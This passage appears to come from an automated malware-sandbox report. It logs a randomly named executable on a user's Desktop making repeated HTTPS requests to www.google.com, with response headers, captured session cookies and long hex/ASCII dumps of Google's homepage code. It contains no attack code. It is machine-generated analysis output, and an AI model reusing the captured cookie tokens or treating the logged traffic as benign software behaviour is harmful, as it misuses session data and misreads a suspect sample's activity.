                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 6f 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 77 65 62
                                                                                                                                                                                                                            Data Ascii: nd:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0 2px 4px rgba(0,0,0,.12);-web
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 20 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 70 61 6c 61 7b 70 61 64 64 69
                                                                                                                                                                                                                            Data Ascii: pms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;padding:10px 20px 0;white-space:nowrap}.gbmpala{paddi


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            15192.168.2.749722142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Dlz9p53E2n09VP1kCrR9NA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-WeTg9aKDnlD30yirkNWGnzWG-GV_u0WMI0OMyKuUj-7YiWb8CzHoA; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=X9xdPVxc4ubQPUl0Z8rtRMUV27aFofiVm1lQTJg8SpvezL69JJvkUKrFdiqzOrhGHXIi9Hk0qyo7tGduOiKSzEJaRv9DR8DmG7c2YwV3leI5wwDwc4cNAnsd0-P_dokvr-8ZllmPf15fxsqBsiUyTuTR002yd8YxtXoxwzE5yfqk82KNIQIOzmLGTWzNoEWq1MHXIdEy2aOrIA; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC195INData Raw: 35 64 32 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73
                                                                                                                                                                                                                            Data Ascii: 5d28<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61
                                                                                                                                                                                                                            Data Ascii: many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standa
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 36 2c 33 34 37 2c 36 30 2c 34 30 37 2c 36 39 32 2c 38 33 32 2c 31 37 37 2c 32 2c 37 38 2c 32 35 38 36 2c 36 30 2c 32 30 31 2c 33 35 33 2c 31 30 33 32 2c 36 2c 31 30 38 2c 31 37 2c 33 2c 33 34 31 2c 34 36 30 2c 32 31 2c 36 36 37 2c 31 36 31 34 2c 33 36 38 2c 36 37 36 2c 31 36 38 2c 33 2c 34 31 30 2c 37 30 36 2c 36 2c 32 2c 35 31 34 2c 33 38 30 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 33 2c 37 32 36 2c 36 34 38 2c 32 2c 31 36 32 2c 35 38 2c 34 39 38 2c 33 30 38 2c 33 31 32 2c 32 31 2c 31 36 2c 31 2c 31 2c 32 33 2c 32 2c 35 32 2c 32 33 37 2c 32 36 39 2c 34 33 38 2c 32 2c 31 2c 32 2c 32 2c 32 2c 33 2c 34 31 2c 35 34 34 2c 37 30 39 2c 32 35 31 2c 35 30 34 2c 38 32 2c 31 36 32 32 2c 32 32 31 2c 32 30 39 37 38 34 33 35 2c 34 30 31 34 38 33 2c 33 32 30 39 2c 31 38
                                                                                                                                                                                                                            Data Ascii: 6,347,60,407,692,832,177,2,78,2586,60,201,353,1032,6,108,17,3,341,460,21,667,1614,368,676,168,3,410,706,6,2,514,380,1,5,4,4,4,163,726,648,2,162,58,498,308,312,21,16,1,1,23,2,52,237,269,438,2,1,2,2,2,3,41,544,709,251,504,82,1622,221,20978435,401483,3209,18
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 76 61 72 20 64 3b 28 64 3d 67 6f 6f
                                                                                                                                                                                                                            Data Ascii: ;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=goo
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 39 39 38 3b 72 69 67 68 74 3a 30 7d 2e 67 62 74 6f 20 23 67 62 73
                                                                                                                                                                                                                            Data Ascii: height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidden;z-index:998;right:0}.gbto #gbs
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67 68 74 3a 35 70 78 5c 30 2f 3b 62 6f 74 74 6f 6d 3a 34 70 78 5c 30 2f 7d 2e 67 62 6d 61 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a
                                                                                                                                                                                                                            Data Ascii: Transform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;bottom:4px\0/}.gbma{position:relative;top:
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61
                                                                                                                                                                                                                            Data Ascii: right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_ba
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75
                                                                                                                                                                                                                            Data Ascii: {*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);backgrou
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 6f 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 77 65 62 6b 69
                                                                                                                                                                                                                            Data Ascii: :#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0 2px 4px rgba(0,0,0,.12);-webki
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 20 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 70 61 6c 61 7b 70 61 64 64 69 6e 67
                                                                                                                                                                                                                            Data Ascii: s2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;padding:10px 20px 0;white-space:nowrap}.gbmpala{padding


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            16192.168.2.749717142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-kTiShD0M0kiSo0pUlZe-Fw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-Xv-WY6SbFeZm4LTJm5-fbhAAKpyvIjF5Haw3MT165mQLtI_3vhWRw; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=AqgMWim-KsYlz2BaoEn5YBBs1zozuiPGTE0WdFfZFpJe40P_FdUmCfHsXwgr-NeUerRIAdke350je1S44Ac--w08HmYyHFp3_Pdzello2HXESvMXaaUnIuyMCa7QIHNp2J8fw-rR74YnePin8DL9geyg5vrtuL7oNKGTs8DzuITJFLpGDzyMMpR51U0ncGCxjnJeCdotnHxphA; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC195INData Raw: 34 64 61 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73
                                                                                                                                                                                                                            Data Ascii: 4da0<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61
                                                                                                                                                                                                                            Data Ascii: many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standa
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 2c 34 32 31 2c 39 2c 32 30 38 2c 31 32 2c 33 34 2c 32 33 2c 36 32 34 2c 31 31 2c 31 37 39 31 2c 33 32 36 2c 32 35 30 2c 31 35 31 2c 32 37 35 2c 31 2c 38 35 2c 36 38 36 2c 32 2c 33 37 39 2c 32 2c 32 34 34 2c 32 38 2c 33 34 31 2c 35 32 39 2c 31 37 33 2c 38 31 2c 31 34 32 2c 36 30 33 2c 36 30 2c 31 38 33 2c 39 31 36 2c 32 36 38 2c 35 36 34 2c 31 37 31 2c 38 37 2c 34 39 35 2c 38 33 34 2c 31 35 31 37 2c 31 35 32 30 2c 31 37 2c 33 2c 34 32 32 2c 33 2c 33 35 35 2c 32 31 2c 32 30 30 2c 31 2c 36 30 34 2c 31 2c 39 32 39 2c 39 31 33 2c 35 38 33 2c 39 34 2c 31 36 34 2c 33 2c 34 31 38 2c 31 36 30 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 33 2c 33 36 35 2c 33 36 31 2c 36 34 38 2c 33 2c 32 31 38 2c 33 35 32 2c 31 34 38 2c 36 31 37 2c 32 34 2c 31 35 2c 31 2c 31 2c 37 39
                                                                                                                                                                                                                            Data Ascii: ,421,9,208,12,34,23,624,11,1791,326,250,151,275,1,85,686,2,379,2,244,28,341,529,173,81,142,603,60,183,916,268,564,171,87,495,834,1517,1520,17,3,422,3,355,21,200,1,604,1,929,913,583,94,164,3,418,1604,1,5,4,4,4,163,365,361,648,3,218,352,148,617,24,15,1,1,79
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b
                                                                                                                                                                                                                            Data Ascii: {return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};
